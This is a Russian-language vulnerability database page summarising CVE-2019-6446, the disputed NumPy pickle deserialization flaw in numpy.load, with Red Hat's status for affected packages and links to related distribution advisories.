Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2019-6446

Опубликовано: 16 янв. 2019
Источник: redhat
CVSS3: 8.8

Описание

An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources

Отчет

Red Hat Enterprise Virtualization Management Appliance includes the vulnerable version of numpy, however it is not used and this vulnerability is not exposed. Red Hat OpenStack Platform includes a vulnerable version of numpy, however it is not used in a vulnerable manner.

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat Ceph Storage 4numpyAffected
Red Hat Enterprise Linux 6numpyWill not fix
Red Hat Enterprise Linux 7numpyWill not fix
Red Hat OpenStack Platform 13 (Queens)numpyWill not fix
Red Hat OpenStack Platform 14 (Rocky)numpyWill not fix
Red Hat Software Collectionspython27-numpyWill not fix
Red Hat Software Collectionsrh-python35-numpyWill not fix
Red Hat Software Collectionsrh-python36-numpyWill not fix
Red Hat Virtualization 4rhvm-applianceWill not fix
Red Hat Enterprise Linux 8python27FixedRHSA-2019:333505.11.2019

Показывать по

Ссылки на источники

Дополнительная информация

Статус:

Moderate
Дефект:
CWE-358->CWE-20
https://bugzilla.redhat.com/show_bug.cgi?id=1667950numpy: crafted serialized object passed in numpy.load() in pickle python module allows arbitrary code execution

8.8 High

CVSS3

Связанные уязвимости

ubuntu логотип

CVE-2019-6446

CVSS3: 9.8
ubuntu
больше 6 лет назад

** DISPUTED ** An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

nvd логотип

CVE-2019-6446

CVSS3: 9.8
nvd
больше 6 лет назад

An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources

debian логотип

CVE-2019-6446

CVSS3: 9.8
debian
больше 6 лет назад

An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickl ...

suse-cvrf логотип

openSUSE-SU-2019:2227-1

suse-cvrf
больше 5 лет назад

Security update for python-numpy

suse-cvrf логотип

openSUSE-SU-2019:2225-1

suse-cvrf
больше 5 лет назад

Security update for python-numpy

8.8 High

CVSS3